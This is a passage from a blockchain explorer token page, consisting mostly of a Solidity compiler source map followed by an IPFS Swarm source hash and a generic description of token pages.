;13129:12;13119:22;;13049:99;;;:::o;13154:168::-;13237:11;13271:6;13266:3;13259:19;13311:4;13306:3;13302:14;13287:29;;13154:168;;;;:::o;13328:169::-;13412:11;13446:6;13441:3;13434:19;13486:4;13481:3;13477:14;13462:29;;13328:169;;;;:::o;13503:148::-;13605:11;13642:3;13627:18;;13503:148;;;;:::o;13657:305::-;13697:3;13716:20;13734:1;13716:20;:::i;:::-;13711:25;;13750:20;13768:1;13750:20;:::i;:::-;13745:25;;13904:1;13836:66;13832:74;13829:1;13826:81;13823:107;;;13910:18;;:::i;:::-;13823:107;13954:1;13951;13947:9;13940:16;;13657:305;;;;:::o;13968:185::-;14008:1;14025:20;14043:1;14025:20;:::i;:::-;14020:25;;14059:20;14077:1;14059:20;:::i;:::-;14054:25;;14098:1;14088:35;;14103:18;;:::i;:::-;14088:35;14145:1;14142;14138:9;14133:14;;13968:185;;;;:::o;14159:348::-;14199:7;14222:20;14240:1;14222:20;:::i;:::-;14217:25;;14256:20;14274:1;14256:20;:::i;:::-;14251:25;;14444:1;14376:66;14372:74;14369:1;14366:81;14361:1;14354:9;14347:17;14343:105;14340:131;;;14451:18;;:::i;:::-;14340:131;14499:1;14496;14492:9;14481:20;;14159:348;;;;:::o;14513:191::-;14553:4;14573:20;14591:1;14573:20;:::i;:::-;14568:25;;14607:20;14625:1;14607:20;:::i;:::-;14602:25;;14646:1;14643;14640:8;14637:34;;;14651:18;;:::i;:::-;14637:34;14696:1;14693;14689:9;14681:17;;14513:191;;;;:::o;14710:96::-;14747:7;14776:24;14794:5;14776:24;:::i;:::-;14765:35;;14710:96;;;:::o;14812:90::-;14846:7;14889:5;14882:13;14875:21;14864:32;;14812:90;;;:::o;14908:149::-;14944:7;14984:66;14977:5;14973:78;14962:89;;14908:149;;;:::o;15063:126::-;15100:7;15140:42;15133:5;15129:54;15118:65;;15063:126;;;:::o;15195:77::-;15232:7;15261:5;15250:16;;15195:77;;;:::o;15278:158::-;15360:9;15393:37;15424:5;15393:37;:::i;:::-;15380:50;;15278:158;;;:::o;15442:126::-;15492:9;15525:37;15556:5;15525:37;:::i;:::-;15512:50;;15442:126;;;:::o;15574:113::-;15624:9;15657:24;15675:5;15657:24;:::i;:::-;15644:37;;15574:113;;;:::o;15693:154::-;15777:6;15772:3;15767;15754:30;15839:1;15830:6;15825:3;15821:16;15814:27;15693:154;;;:::o;15853:307::-;15921:1;15931:113;15945:6;15942:1;15939:13;15931:113;;;16030:1;16025:3;16021:11;16015:18;16011:1;16006:3;16002:11;15995:39;15967:2;15964:1;15960:10;15955:15;;15931:113;;;16062:6;16059:1;16056:13;16053:101;;;16142:1;16133:6;16128:3;16124:16;16117:27;16053:101;15902:258;15853:307;;;:::o;16166:320::-;16210:6;16247:1;16241:4;16237:12;16227:22;;16294:1;16288:4;16284:12;16315:18;16305:81;;16371:4;16363:6;16359:17;16349:27;;16305:81;16433:2;16425:6;16422:14;16402:18;16399:38;16396:84;;;16452:18;;:::i;:::-;16396:84;16217:269;16166:320;;;:::o;16492:281::-;16575:27;16597:4;16575:27;:::i;:::-;16567:6;16563:40;16705:6;16693:10;16690:22;16669:18;16657:10;16654:34;16651:62;16648:88;;;16716:18;;:::i;:::-;16648:88;16756:10;16752:2;16745:22;16535:238;16492:281;;:::o;16779:233::-;16818:3;16841:24;16859:5;16841:24;:::i;:::-;16832:33;;16887:66;16880:5;16877:77;16874:103;;;16957:18;;:::i;:::-;16874:103;17004:1;16997:5;16993:13;16986:20;;16779:233;;;:::o;17018:180::-;17066:77;17063:1;17056:88;17163:4;17160:1;17153:15;17187:4;17184:1;17177:15;17204:180;17252:77;17249:1;17242:88;17349:4;17346:1;17339:15;17373:4;17370:1;17363:15;17390:180;17438:77;17435:1;17428:88;17535:4;17532:1;17525:15;17559:4;17556:1;17549:15;17576:180;17624:77;17621:1;17614:88;17721:4;17718:1;17711:15;17745:4;17742:1;17735:15;17762:117;17871:1;17868;17861:12;17885:117;17994:1;17991;17984:12;18008:117;18117:1;18114;18107:12;18131:117;18240:1;18237;18230:12;18254:102;18295:6;18346:2;18342:7;18337:2;18330:5;18326:14;18322:28;18312:38;;18254:102;;;:::o;18362:303::-;18502:34;18498:1;18490:6;18486:14;18479:58;18575:34;18570:2;18562:6;18558:15;18551:59;18648:5;18643:2;18635:6;18631:15;18624:30;18362:303;:::o;18675:163::-;18819:7;18815:1;18807:6;18803:14;18796:31;18675:163;:::o;18848:130::-;18925:24;18943:5;18925:24;:::i;:::-;18918:5;18915:35;18905:63;;18964:1;18961;18954:12;18905:63;18848:130;:::o;18988:124::-;19062:21;19077:5;19062:21;:::i;:::-;19055:5;19052:32;19042:60;;19098:1;19095;19088:12;19042:60;18988:124;:::o;19122:128::-;19198:23;19215:5;19198:23;:::i;:::-;19191:5;19188:34;19178:62;;19236:1;19233;19226:12;19178:62;19122:128;:::o;19260:130::-;19337:24;19355:5;19337:24;:::i;:::-;19330:5;19327:35;19317:63;;19376:1;19373;19366:12;19317:63;19260:130;:::o

Swarm Source

ipfs://c2b3038db840730d6c4a7ec0602c831175862bd650e54af7a52756c628e6ccc2
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.